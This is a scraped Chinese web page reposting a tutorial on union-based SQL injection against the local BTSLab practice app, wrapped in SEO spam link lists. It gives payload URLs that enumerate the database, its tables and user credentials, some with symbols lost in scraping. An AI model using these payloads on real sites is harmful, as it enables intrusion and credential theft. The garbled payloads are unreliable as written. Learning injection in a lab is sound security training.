当前位置: 首页 > news >正文

南京市网站建设_网站建设公司_前端开发_seo优化

化妆品成品网站,怎么打开手机app,北京网站制作公司公司,网络推广有基于联合调查的SQL注入 我们先了解一下mysql的系统函数 user()database()version()concat()group_concat()datadir当前使用者的用户名当前数据库名数据库版本连接一个或者多个字符串接一个组的所有字符串#xff0c;并以逗号分隔每一条数据读取数据库的绝对路径这里给大家提供… 基于联合调查的SQL注入 我们先了解一下mysql的系统函数   user()database()version()concat()group_concat()datadir当前使用者的用户名当前数据库名数据库版本连接一个或者多个字符串接一个组的所有字符串并以逗号分隔每一条数据读取数据库的绝对路径这里给大家提供一个SQL注入的实验平台。http://localhost/btslab/vulnerability/ForumPosts.php?id1请打开phpstudy使用 数字型注入 我们以http://localhost/btslab/vulnerability/ForumPosts.php?id1为例可以看出这是一个动态URL也就是说可以在地址栏中传参这是SQL注入的基本条件。 1.判断是否能sql注入 http://localhost/btslab/vulnerability/ForumPosts.php?id1                     ①  页面返回错误 http://localhost/btslab/vulnerability/ForumPosts.php?id1 and 11        ②  页面返回正常 http://localhost/btslab/vulnerability/ForumPosts.php?id1 and 12         ③  页面返回错误 如果符合上述三点则我们可以确定可以进行SQL注入且id是一个注入点。 2.查数据库 http://localhost/btslab/vulnerability/ForumPosts.php?id1and ord(mid(version(),1,1))51 如果返回正常页面说明数据库是mysql并且版本大于4.0支持union查询反之是4.0以下版本或者其他类型数据库。  3.查字段 a. http://localhost/btslab/vulnerability/ForumPosts.php?id1 order by 5   返回错误页面说明字段小于5。 b.http://localhost/btslab/vulnerability/ForumPosts.php?id1 order by 4    返回正常页面说明字段为4。 当然我们可以从1开始依次列举。  5.查列数 http://localhost/btslab/vulnerability/ForumPosts.php?id1 and 12 union select 1234  我们发现页面返回给我们两个数字24。 这里的24指是数据储存的位置也就是我们可以把这个数字中的一个或者多个替换成我们想要查询的关键字。 6.查数据库名   http://localhost/btslab/vulnerability/ForumPosts.php?id1 and 12 union select 1,database(),34               浏览器给我们返回了bts  。说明这个网站 的数据库库名是 bts 7.查表 http://localhost/btslab/vulnerability/ForumPosts.php?id1 and 12 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schemadatabase() 补充一下MYSQL中有个数据库叫 information_schema数据库中有个表名叫tables其中的table_name列储存了所有数据库中的所有表名而table_schema则储存着该表所在的数据库名group_concat可以把多项数据合成一个字符串返回 查到bts下的表名messagespoststdatausers  8.同样我们也可以查询用户名和密码。 http://localhost/btslab/vulnerability/ForumPosts.php?id1 and 12 union select 1,username,3,password 注意这里的users是表名而不是固定的。 字符型注入           简而言之基于字符型的SQL注入即存在SQL注入漏洞的URL参数为字符串类型需要使用单引号表示。如select * from 表名 where id 1 在这里我们仍然以http://localhost/btslab/vulnerability/ForumPosts.php?id1 为例。 1.判断是否为字符型注入 http://localhost/btslab/vulnerability/ForumPosts.php?id1 ①页面返回错误 http://localhost/btslab/vulnerability/ForumPosts.php?id1②页面返回正常 如果符合上述情况则可以确定这是字符型注入且id是一个注入点。 2.查字段http://localhost/btslab/vulnerability/ForumPosts.php?id1 order by 1 # 同上 此时数据库中的查询语句为select * from 表名 wher id1 order by 1 # 这里为了达到引号闭合的目的我们需要注释一个引号。 3.查列数http://localhost/btslab/vulnerability/ForumPosts.php?id-1 union select 1,2,3,4 # 4.查数据库名http://localhost/btslab/vulnerability/ForumPosts.php?id-1 union select 1,database(),3,4 #   得到表名bts 5.查表http://localhost/btslab/vulnerability/ForumPosts.php?id-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schemadatabase() # 6.查询用户名和密码 http://localhost/btslab/vulnerability/ForumPosts.php?id-1 union select 1,username,3,password #                                                                    转载于:https://www.cnblogs.com/So7cool/p/9826616.html
http://www.ihoyoo.com/news/121495.html

相关文章:

  • 嘉兴住房和城乡建设厅网站做网站的题目
  • 夺宝网站还可以做吗临沂网站制作案例
  • 九龙坡区建设二校的网站做网站要准备什么资料
  • 网站支付接口如何做网站被收录后又被提出了
  • 自己的网站怎么做实时监控wordpress get_page
  • 吉林市网站制作哪家好上海最大的贸易公司
  • 做影评的网站模版企业手机网站cms
  • 移动网站推广浙江省工程建设管理质量协会网站
  • 吉林省建设厅信息网站重要新闻摘抄2022
  • 做网站在阿里云买什么服装公司电商网站建设规划
  • 新媒体网站建设wordpress tag函数
  • 跨境电商东莞网站建设网站建设协议书是否贴花
  • 网站建设 软件开发的公司排名武威做网站
  • 网站源码怎么获取合肥市网站制作
  • 国内外优秀设计网站宣传片制作公司佛山
  • 公司建立网站青岛电话百度推广登录首页
  • 北京做网站建设价格网站开发学那个语言比较好
  • php语言做的大网站云南省省建设厅网站
  • 哈尔滨网站设计有哪些步骤网页网站怎么做的
  • wordpress建站 云打印免费下载logo素材
  • 网站在哪里搜索做一个网站推广
  • 天津武清做网站tjniu新型网络搜索引擎
  • 太原网站制作哪家好wordpress 订阅插件
  • 哪里有手机网站制作公司中国建设银行官方网站纪念币预约
  • 做网站一定需要icp么图片wordpress源码
  • 清华大学绿色大学建设网站网页设计作业保护动物
  • 网站开发开发需求文档青岛开发区网站建设服务
  • 网站设计的素材龙岩市住房和城乡建设局网站
  • 濮阳住房建设厅网站wordpress 会员发文
  • 廊坊智能模板建站寓意好的装饰公司名称